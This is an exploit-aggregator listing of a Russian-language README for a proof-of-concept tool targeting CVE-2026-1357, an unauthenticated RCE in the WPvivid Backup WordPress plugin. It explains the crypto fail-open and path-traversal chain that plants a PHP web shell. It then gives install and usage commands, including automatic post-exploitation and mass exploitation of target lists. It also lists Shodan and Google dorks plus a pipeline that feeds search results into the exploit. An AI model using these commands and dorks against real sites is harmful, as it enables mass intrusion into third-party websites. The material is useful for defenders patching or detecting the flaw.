Sploitus

Exploit for CVE-2026-1357-POC

kitploit · 2026-09-02

Exploit Code

MARKDOWN131 lines
## https://sploitus.com/exploit?id=KITPLOIT:TOOLS-GITHUB-CYBERTECHAJJU-CVE-2026-1357-POC
# CVE-2026-1357 — WPvivid Backup & Migration RCE

> **Автор CVE:** Lucas Montes (NiRoX)  
>  **Инструмент:** CyberTechAjju  
>  **CVSS:** 9.8 (Critical) | **Затронуто:** ≤ 0.9.123 | **Исправлено:** 0.9.124

* * *

## ⚠️ Отказ от ответственности

Только для **авторизованного тестирования безопасности**. Несанкционированный доступ к системам незаконен.

* * *

## Обзор

Неаутентифицированная RCE в WPvivid Backup & Migration через две связанные уязвимости:

  1. **Crypto Fail-Open** — `openssl_private_decrypt()` возвращает `false` при неверном ключе → `phpseclib` v1 обрабатывает его как AES-ключ из нулевых байтов → атакующий шифрует 16 нулевыми байтами
  2. **Path Traversal** — несанитизированное поле `name` → `../uploads/shell.php` выходит за пределы каталога резервных копий



**Ограничение:** Эксплуатация возможна только когда `wpvivid_api_token` сгенерирован и не истёк.

* * *

## Возможности

* * *

## Установка

root@kitploit:~
    
    
    git clone https://github.com/cybertechajju/CVE-2026-1357-poc.git
    cd CVE-2026-1357-poc
    pip install -r requirements.txt
    

* * *

## Использование

root@kitploit:~
    
    
    # Только сканирование (определение WordPress + WPvivid + версии)
    python3 cve_2026_1357.py -u http://target.com
    
    # Сканирование + эксплуатация + автоматическая постэксплуатация
    python3 cve_2026_1357.py -u http://target.com --exploit
    
    # Эксплуатация без постэксплуатационной разведки
    python3 cve_2026_1357.py -u http://target.com --exploit --no-post
    
    # Массовое сканирование с отчётом
    python3 cve_2026_1357.py -l targets.txt -t 20 --exploit --report
    
    # Через прокси Burp
    python3 cve_2026_1357.py -u http://target.com --exploit --proxy http://127.0.0.1:8080
    
    # Режим только полезной нагрузки
    python3 cve_2026_1357.py -u http://x --payload-only
    

### Все параметры

root@kitploit:~
    
    
    -u, --url         URL одиночной цели
    -l, --list        Файл со списком URL (по одному в строке)
    --exploit         Включить режим эксплуатации
    --shell NAME      Имя файла шелла (по умолчанию: pwn_remote.php)
    --no-post         Пропустить постэксплуатационную разведку
    --report          Сгенерировать markdown PoC-отчёт
    --report-dir DIR  Каталог для отчётов
    -t, --threads N   Параллельные потоки (по умолчанию: 5)
    --timeout SECS    Таймаут запроса (по умолчанию: 10)
    --proxy URL       HTTP-прокси для Burp
    --payload-only    Вывести base64-полезную нагрузку и выйти
    

![Screenshot_2026-02-14_00_18_14](https://assets.kitploit.com/production/public/readmes/52054/3e11fac5e5b7dd4d991de1dbb6d47cff13b3e8dddd53adda0e439367833e7913/1c592836f06c151026a90f85c7f2efa44a6684d202e82d4edbbdb7c874072e83-display-v1.webp) ![Screenshot_2026-02-14_00_18_55](https://assets.kitploit.com/production/public/readmes/52054/59532d5e5b9d807285068d1468e598a5c436c95c1613075a7e668ed21783edfb/63a88699d2d8d8a12fe678b6f4a3d4cdfa2ac6d65175d710a3b95bf83f0cd196-display-v1.webp)

* * *

## Поиск целей (Dorks)

Полный список см. в **dorks.md**. Быстрые примеры:

root@kitploit:~
    
    
    # Shodan
    http.html:"wpvivid-backuprestore"
    http.html:"wpvivid" http.component:"WordPress"
    
    # Google
    inurl:"/wp-content/plugins/wpvivid-backuprestore/readme.txt"
    
    # Pipeline
    shodan search 'http.html:"wpvivid-backuprestore"' --fields ip_str,port --limit 500 \
      | awk '{print "http://"$1":"$2}' > targets.txt
    python3 cve_2026_1357.py -l targets.txt -t 20 --exploit --report
    

* * *

## Файлы

root@kitploit:~
    
    
    CVE-2026-1357-poc/
    ├── cve_2026_1357.py    ← Основной инструмент (сканер + эксплойт + постэксплуатация)
    ├── dorks.md            ← Dorks для Shodan/Google/Censys/FOFA/ZoomEye
    ├── requirements.txt    ← Зависимости Python
    ├── .gitignore
    └── README.md           ← Этот файл
    

* * *

## Авторы

**Lucas Montes (NiRoX)** — обнаружение CVE  
**CyberTechAjju** — инструмент эксплуатации